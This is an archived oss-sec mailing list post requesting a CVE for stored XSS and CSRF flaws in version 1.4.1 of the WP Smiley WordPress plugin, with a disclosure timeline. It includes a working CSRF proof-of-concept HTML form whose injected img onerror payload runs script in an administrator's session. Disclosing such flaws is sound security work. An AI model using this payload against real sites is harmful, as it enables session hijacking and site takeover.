oss-sec mailing list archives
CVE request: XSS and CSRF in WP Smiley plugin for WordPress
From: Henri Salo <Henri.Salo () nixu com>
Date: Fri, 29 May 2015 14:40:01 +0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 We found following vulnerabilities with Joni Hauhia. Could you assign CVE for these issues, thanks. Product: WordPress plugin wp-smiley Plugin page: https://wordpress.org/plugins/wp-smiley/ Developer: As247 (no contact information available) Vulnerability Type: CWE-79: Cross-site scripting CWE-352: Cross-Site Request Forgery Vulnerable Versions: 1.4.1 Fixed Version: N/A Solution Status: N/A Vendor Notification: 2015-03-24 Public Disclosure: 2015-05-29 Vulnerability details: WP Smiley plugin for WordPress contains a flaw that allows a stored cross-site-scripting (XSS) attack. This flaw exists because the smilies4wp.php script does not validate input properly before returning it to users. This allows an authenticated remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Editor-level user account can use this cross-site scripting vulnerability against Administrator-level users. Root cause: The software incorrectly sanitizes user-controllable input before it is placed in output that is used as a web page that is served to users. Proof-of-concept: This vulnerability can be demonstrated with following cross-site request forgery PoC below. Notes: Other parameters are also possibly insecure (not tested). Other versions not tested. References: Cross-site Scripting: http://cwe.mitre.org/data/definitions/79.html https://scapsync.com/cwe/CWE-79 https://en.wikipedia.org/wiki/Cross-site_scripting Cross-Site Request Forgery: http://cwe.mitre.org/data/definitions/352.html https://scapsync.com/cwe/CWE-352 https://en.wikipedia.org/wiki/Cross-site_request_forgery Timeline: 2015-03-24: Notification about vulnerability for WordPress plugins team 2015-03-24: CVE request from MITRE (no response) 2015-03-25: WordPress plugins team responds and disables plugin from archive 2015-04-10: Sent emails to sites, which I knew using this plugin 2015-04-15: Asked status of CVE from MITRE (no response) 2015-05-29: Public disclosure CSRF XSS PoC: <html> <body> <form action="https://example.com/wp-admin/options-general.php?page=smilies4wp.php"; method="POST"> <input type="hidden" name="s4w-disp" value="">" /> <input type="hidden" name="s4w-cfid" value="comment" /> <input type="hidden" name="s4w-more" value="More>>"><img src='#' onerror=alert(document.cookie) />" /> <input type="hidden" name="s4w-less" value="Less<<" /> <input type="hidden" name="s4w-cp" value="1" /> <input type="hidden" name="s4w-cc" value="1" /> <input type="hidden" name="s4w-cfa" value="1" /> <input type="hidden" name="s4w-update" value="Update �»" /> <input type="hidden" name="icon_evil|gif[]" value=":)" /> <input type="hidden" name="icon_evil|gif[]" value="" /> <input type="hidden" name="icon_surprised|gif[]" value="" /> <input type="hidden" name="icon_surprised|gif[]" value="" /> <input type="hidden" name="icon_question|gif[]" value="" /> <input type="hidden" name="icon_question|gif[]" value="" /> <input type="hidden" name="icon_mad|gif[]" value="" /> <input type="hidden" name="icon_mad|gif[]" value="" /> <input type="hidden" name="icon_confused|gif[]" value="" /> <input type="hidden" name="icon_confused|gif[]" value="" /> <input type="hidden" name="icon_twisted|gif[]" value="" /> <input type="hidden" name="icon_twisted|gif[]" value="" /> <input type="hidden" name="icon_neutral|gif[]" value="" /> <input type="hidden" name="icon_neutral|gif[]" value="" /> <input type="hidden" name="icon_mrgreen|gif[]" value="" /> <input type="hidden" name="icon_mrgreen|gif[]" value="" /> <input type="hidden" name="icon_redface|gif[]" value="" /> <input type="hidden" name="icon_redface|gif[]" value="" /> <input type="hidden" name="icon_razz|gif[]" value="" /> <input type="hidden" name="icon_razz|gif[]" value="" /> <input type="hidden" name="icon_smile|gif[]" value="" /> <input type="hidden" name="icon_smile|gif[]" value="" /> <input type="hidden" name="icon_cool|gif[]" value="" /> <input type="hidden" name="icon_cool|gif[]" value="" /> <input type="hidden" name="icon_exclaim|gif[]" value="" /> <input type="hidden" name="icon_exclaim|gif[]" value="" /> <input type="hidden" name="icon_lol|gif[]" value="" /> <input type="hidden" name="icon_lol|gif[]" value="" /> <input type="hidden" name="icon_wink|gif[]" value="" /> <input type="hidden" name="icon_wink|gif[]" value="" /> <input type="hidden" name="icon_cry|gif[]" value="" /> <input type="hidden" name="icon_cry|gif[]" value="" /> <input type="hidden" name="icon_biggrin|gif[]" value="" /> <input type="hidden" name="icon_biggrin|gif[]" value="" /> <input type="hidden" name="icon_idea|gif[]" value="" /> <input type="hidden" name="icon_idea|gif[]" value="" /> <input type="hidden" name="icon_rolleyes|gif[]" value="" /> <input type="hidden" name="icon_rolleyes|gif[]" value="" /> <input type="hidden" name="icon_eek|gif[]" value="" /> <input type="hidden" name="icon_eek|gif[]" value="" /> <input type="hidden" name="icon_arrow|gif[]" value="" /> <input type="hidden" name="icon_arrow|gif[]" value="" /> <input type="hidden" name="icon_sad|gif[]" value="" /> <input type="hidden" name="s4w-style" value="	.s4w-smilies { 	text-align: center; 	position:relative; 	height:0px; } .s4w-smilies-content { 	width: 300px; 	padding: 3px; 	line-height: 120%; 	position:absolute; 	border: 1px solid #BFCAD2; 	background:#fff; 	left:160px; 	top:-10px; 	 } .wp-smiley-button { border: 1px solid #ccc; margin: 1px; padding: 2px; } .wp-smiley-button:hover { cursor:pointer; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=60); -moz-opacity: 0.6; }" /> <input type="submit" value="Submit request" /> </form> </body> </html> - -- Henri Salo Security Specialist, Nixu Oy Mobile: +358 40 770 5733 PL 39 FIN (Keilaranta 15) FIN-02151 Espoo, Finland -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVaFARAAoJEHu3+uinl6paKbkP/0/77ILgY2/T+nybAinYTSy+ JWs76w2UL9lyh1lRo3g+CE7RfTj56RB6tObZ6phMahgZKo/w6sVllk0L/MS8G1QR pHaTsTnpAR0rqFE8fqzPQ4QsQ0Zv1Exn+FVXke6qF0RzGVdXwVoiZseTg2wAxOWg zqvlAPGd2dQvvTmmUIBj8QTfNw8Z1jJhxNdVQ5fhg5fNPjcRzBO5pfeIeLu6yrvs 717ATOsInJ19iZKVw6IrId12XBvKmX3VDX2HJMY0vwFUSmdEUSNUsgOV6QsAHu+I EffEUJYDPIuC4zaEo7dT4OwwzjE8YPQ87xUW1cXMEWf8619PRj0GQ0fQuQ+q/Zl4 A6RmayvvGLSu4ogsbb5HFJubCdFuRR0y3HXMXbVCQZdeRzDjgJAiFjpS0zRG8W/q Hwpco++dSJowSvyiouk9SZA0Zf9t69Ro4nIYUgMrn+BfZFII7YIlFfuWXD2qpPsE mxlsCkwFAta2I4fZXDtl0QJqwqghs4PexeMqFhCfN3BeXLeItZuON9cL0X6av+oZ O3P5qt4D0lb22t/Onj0VDx/wkK8ZQOifMdluHGLb7HOnoIpELlpfYwo+b4NaoDIh oIGDm97IGyDByejNBQ97XNCvQoy42WNhpAeCqIW6eXcMYssO0r4uhZmAvSbzWASZ yrT8K8gJgUBnXwS0XP10 =chYh -----END PGP SIGNATURE-----
Current thread:
- CVE request: XSS and CSRF in WP Smiley plugin for WordPress Henri Salo (May 29)
- Re: CVE request: XSS and CSRF in WP Smiley plugin for WordPress cve-assign (May 31)